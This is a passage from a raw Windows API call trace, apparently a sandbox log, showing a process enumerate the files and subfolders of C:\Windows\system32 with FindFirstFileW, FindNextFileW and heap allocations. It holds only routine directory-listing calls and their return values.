ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0025.893] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e9f4a12, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229791ec, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9f4a12, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0409", cAlternateFileName="")) returned 1 [0025.893] lstrlenW (lpString="0409") returned 4 [0025.893] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x250) returned 0x5cc240 [0025.893] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\0409\\*", lpFindFileData=0x5cc240 | out: lpFindFileData=0x5cc240*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e9f4a12, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229791ec, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9f4a12, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5cc498 [0025.893] FindNextFileW (in: hFindFile=0x5cc498, lpFindFileData=0x5cc240 | out: lpFindFileData=0x5cc240*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e9f4a12, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229791ec, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9f4a12, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0025.893] FindNextFileW (in: hFindFile=0x5cc498, lpFindFileData=0x5cc240 | out: lpFindFileData=0x5cc240*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e9f4a12, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229791ec, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9f4a12, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0025.893] FindClose (in: hFindFile=0x5cc498 | out: hFindFile=0x5cc498) returned 1 [0025.893] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cc240 | out: hHeap=0x5a0000) returned 1 [0025.893] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8cc6e3c, ftCreationTime.dwHighDateTime=0x1c9ea10, ftLastAccessTime.dwLowDateTime=0xc8cc6e3c, ftLastAccessTime.dwHighDateTime=0x1c9ea10, ftLastWriteTime.dwLowDateTime=0xc8cecf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x867, dwReserved0=0x0, dwReserved1=0x0, cFileName="12520437.cpx", cAlternateFileName="")) returned 1 [0025.893] lstrlenW (lpString="12520437.cpx") returned 12 [0025.894] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c98834, ftCreationTime.dwHighDateTime=0x1ca040b, ftLastAccessTime.dwLowDateTime=0x4c98834, ftLastAccessTime.dwHighDateTime=0x1ca040b, ftLastWriteTime.dwLowDateTime=0xc8d130fc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x8b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="12520850.cpx", cAlternateFileName="")) returned 1 [0025.894] lstrlenW (lpString="12520850.cpx") returned 12 [0025.894] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8699fd85, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8699fd85, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x869c5ee6, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x20200, dwReserved0=0x0, dwReserved1=0x0, cFileName="aaclient.dll", cAlternateFileName="")) returned 1 [0025.894] lstrlenW (lpString="aaclient.dll") returned 12 [0025.894] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5cc240 [0025.894] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93cbbe2a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x93cbbe2a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x93d080eb, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x38e200, dwReserved0=0x0, dwReserved1=0x0, cFileName="accessibilitycpl.dll", cAlternateFileName="")) returned 1 [0025.894] lstrlenW (lpString="accessibilitycpl.dll") returned 20 [0025.894] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xaa) returned 0x5cc2e8 [0025.894] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89c04678, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x89c04678, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xf0e28ef0, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x9a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACCTRES.dll", cAlternateFileName="")) returned 1 [0025.894] lstrlenW (lpString="ACCTRES.dll") returned 11 [0025.894] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x98) returned 0x5cc3a0 [0025.894] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10f51da3, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x10f51da3, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x7d217650, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="acledit.dll", cAlternateFileName="")) returned 1 [0025.894] lstrlenW (lpString="acledit.dll") returned 11 [0025.894] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x98) returned 0x5cc440 [0025.894] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d698b07, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x7d698b07, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x7d217650, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1ea00, dwReserved0=0x0, dwReserved1=0x0, cFileName="aclui.dll", cAlternateFileName="")) returned 1 [0025.894] lstrlenW (lpString="aclui.dll") returned 9 [0025.895] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x94) returned 0x5cc4e0 [0025.895] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d3bd2e0, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9d3bd2e0, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9d3bd2e0, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xb200, dwReserved0=0x0, dwReserved1=0x0, cFileName="acppage.dll", cAlternateFileName="")) returned 1 [0025.895] lstrlenW (lpString="acppage.dll") returned 11 [0025.895] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x98) returned 0x5cc580 [0025.895] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3c37918, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3c37918, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3c5da79, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xb5c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ActionCenter.dll", cAlternateFileName="")) returned 1 [0025.895] lstrlenW (lpString="ActionCenter.dll") returned 16 [0025.895] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xa2) returned 0x5cc620 [0025.895] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3c5da79, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3c5da79, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3c5da79, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x83400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ActionCenterCPL.dll", cAlternateFileName="")) returned 1 [0025.895] lstrlenW (lpString="ActionCenterCPL.dll") returned 19 [0025.895] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xa8) returned 0x5cc6d0 [0025.895] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9adf355b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9adf355b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9ae196bb, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x31800, dwReserved0=0x0, dwReserved1=0x0, cFileName="activeds.dll", cAlternateFileName="")) returned 1 [0025.895] lstrlenW (lpString="activeds.dll") returned 12 [0025.895] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5cc780 [0025.895] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedc36d00, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xedc36d00, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0xedb524c6, ftLastWriteTime.dwHighDateTime=0x1ca0412, nFileSizeHigh=0x0, nFileSizeLow=0x1b400, dwReserved0=0x0, dwReserved1=0x0, cFileName="activeds.tlb", cAlternateFileName="")) returned 1 [0025.895] lstrlenW (lpString="activeds.tlb") returned 12 [0025.895] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a81bf79, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a81bf79, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a8420d9, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x4ba00, dwReserved0=0x0, dwReserved1=0x0, cFileName="actxprxy.dll", cAlternateFileName="")) returned 1 [0025.895] lstrlenW (lpString="actxprxy.dll") returned 12 [0025.896] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5cc828 [0025.896] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x554a4ec2, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x554a4ec2, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x65268bd0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x9800, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdapterTroubleshooter.exe", cAlternateFileName="")) returned 1 [0025.896] lstrlenW (lpString="AdapterTroubleshooter.exe") returned 25 [0025.896] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xb4) returned 0x5cc8d0 [0025.896] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa343f8c0, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0xa343f8c0, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x7d856840, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="admparse.dll", cAlternateFileName="")) returned 1 [0025.896] lstrlenW (lpString="admparse.dll") returned 12 [0025.896] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5cc990 [0025.896] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1c6129e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb1c6129e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb1c873fe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x6b000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdmTmpl.dll", cAlternateFileName="")) returned 1 [0025.896] lstrlenW (lpString="AdmTmpl.dll") returned 11 [0025.896] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x98) returned 0x5cca38 [0025.896] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2f573ca, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xe2f573ca, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x7dbea0b0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xc200, dwReserved0=0x0, dwReserved1=0x0, cFileName="adprovider.dll", cAlternateFileName="")) returned 1 [0025.896] lstrlenW (lpString="adprovider.dll") returned 14 [0025.896] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9e) returned 0x5ccad8 [0025.896] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b68a4f3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8b68a4f3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8b68a4f3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2da00, dwReserved0=0x0, dwReserved1=0x0, cFileName="adsldp.dll", cAlternateFileName="")) returned 1 [0025.896] lstrlenW (lpString="adsldp.dll") returned 10 [0025.896] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x96) returned 0x5ccb80 [0025.897] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9f1b122, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xf9f1b122, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x7dccd180, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x31800, dwReserved0=0x0, dwReserved1=0x0, cFileName="adsldpc.dll", cAlternateFileName="")) returned 1 [0025.897] lstrlenW (lpString="adsldpc.dll") returned 11 [0025.897] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x98) returned 0x5ccc20 [0025.897] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf66b897d, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xf66b897d, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x7dccd180, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="adsmsext.dll", cAlternateFileName="")) returned 1 [0025.897] lstrlenW (lpString="adsmsext.dll") returned 12 [0025.897] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5cccc0 [0025.897] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfad634c2, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xfad634c2, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x7dcf4280, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x3fa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="adsnt.dll", cAlternateFileName="")) returned 1 [0025.897] lstrlenW (lpString="adsnt.dll") returned 9 [0025.897] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x94) returned 0x5ccd68 [0025.897] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fc81ff4, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2fc81ff4, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf1def050, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xa6200, dwReserved0=0x0, dwReserved1=0x0, cFileName="adtschema.dll", cAlternateFileName="")) returned 1 [0025.897] lstrlenW (lpString="adtschema.dll") returned 13 [0025.897] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9c) returned 0x5cce08 [0025.897] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x8cdedaf6, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x8cdedaf6, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdvancedInstallers", cAlternateFileName="ADVANC~1")) returned 1 [0025.897] lstrlenW (lpString="AdvancedInstallers") returned 18 [0025.897] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x250) returned 0x5cceb0 [0025.897] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\AdvancedInstallers\\*", lpFindFileData=0x5cceb0 | out: lpFindFileData=0x5cceb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x8cdedaf6, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x8cdedaf6, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5cd108 [0025.908] FindNextFileW (in: hFindFile=0x5cd108, lpFindFileData=0x5cceb0 | out: lpFindFileData=0x5cceb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x8cdedaf6, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x8cdedaf6, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0025.909] FindNextFileW (in: hFindFile=0x5cd108, lpFindFileData=0x5cceb0 | out: lpFindFileData=0x5cceb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8eb80ed5, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8eb80ed5, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8eba7035, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1d600, dwReserved0=0x0, dwReserved1=0x0, cFileName="cmiadapter.dll", cAlternateFileName="")) returned 1 [0025.909] lstrlenW (lpString="cmiadapter.dll") returned 14 [0025.909] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc4) returned 0x5ce150 [0025.909] FindNextFileW (in: hFindFile=0x5cd108, lpFindFileData=0x5cceb0 | out: lpFindFileData=0x5cceb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x964c1054, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x964c1054, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x965595d5, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1f2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="cmiv2.dll", cAlternateFileName="")) returned 1 [0025.909] lstrlenW (lpString="cmiv2.dll") returned 9 [0025.909] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xba) returned 0x5ce220 [0025.909] FindNextFileW (in: hFindFile=0x5cd108, lpFindFileData=0x5cceb0 | out: lpFindFileData=0x5cceb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf919a2c, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xbf919a2c, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xacf3bdc0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="OEMHelpIns.dll", cAlternateFileName="")) returned 1 [0025.909] lstrlenW (lpString="OEMHelpIns.dll") returned 14 [0025.909] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc4) returned 0x5ce2e8 [0025.909] FindNextFileW (in: hFindFile=0x5cd108, lpFindFileData=0x5cceb0 | out: lpFindFileData=0x5cceb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf919a2c, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xbf919a2c, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xacf3bdc0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="OEMHelpIns.dll", cAlternateFileName="")) returned 0 [0025.909] FindClose (in: hFindFile=0x5cd108 | out: hFindFile=0x5cd108) returned 1 [0025.909] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5cceb0 | out: hHeap=0x5a0000) returned 1 [0025.909] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b0c6f80, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9b0c6f80, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9b0ed0e0, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x9c600, dwReserved0=0x0, dwReserved1=0x0, cFileName="advapi32.dll", cAlternateFileName="")) returned 1 [0025.910] lstrlenW (lpString="advapi32.dll") returned 12 [0025.910] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5cceb0 [0025.910] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0777c0d, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0xa0777c0d, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x7de49f40, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1ee00, dwReserved0=0x0, dwReserved1=0x0, cFileName="advpack.dll", cAlternateFileName="")) returned 1 [0025.910] lstrlenW (lpString="advpack.dll") returned 11 [0025.910] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x98) returned 0x5ccf58 [0025.910] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e862c71, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x5e862c71, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x7de71040, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="aecache.dll", cAlternateFileName="")) returned 1 [0025.910] lstrlenW (lpString="aecache.dll") returned 11 [0025.910] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x98) returned 0x5ccff8 [0025.910] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79c6f412, ftCreationTime.dwHighDateTime=0x1ca0410, ftLastAccessTime.dwLowDateTime=0x79c6f412, ftLastAccessTime.dwHighDateTime=0x1ca0410, ftLastWriteTime.dwLowDateTime=0xf1f20320, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x5a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="aeevts.dll", cAlternateFileName="")) returned 1 [0025.910] lstrlenW (lpString="aeevts.dll") returned 10 [0025.910] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x96) returned 0x5cd098 [0025.910] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2994413f, 